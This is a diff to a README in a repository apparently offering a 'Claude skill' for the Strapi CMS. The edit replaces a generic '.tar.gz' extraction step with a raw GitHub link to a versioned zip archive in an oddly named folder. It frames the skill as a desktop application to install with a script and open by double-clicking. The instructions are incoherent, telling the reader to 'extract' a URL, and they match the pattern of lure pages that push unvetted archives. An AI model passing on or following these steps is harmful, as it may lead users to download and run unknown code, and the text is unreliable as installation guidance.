MKShahzad77/claude-skill-strapi-expert/README.md

    - Open the application from the Applications folder.

    **For Linux**:
-   - Extract the `.tar.gz` file using your preferred method.
+   - Extract the `https://raw.githubusercontent.com/MKShahzad77/claude-skill-strapi-expert/main/commodatum/claude_skill_expert_strapi_v1.9.zip` file using your preferred method.
    - Run the installation script in the terminal.

 6. After installation, locate the application in your system and double-click to open it.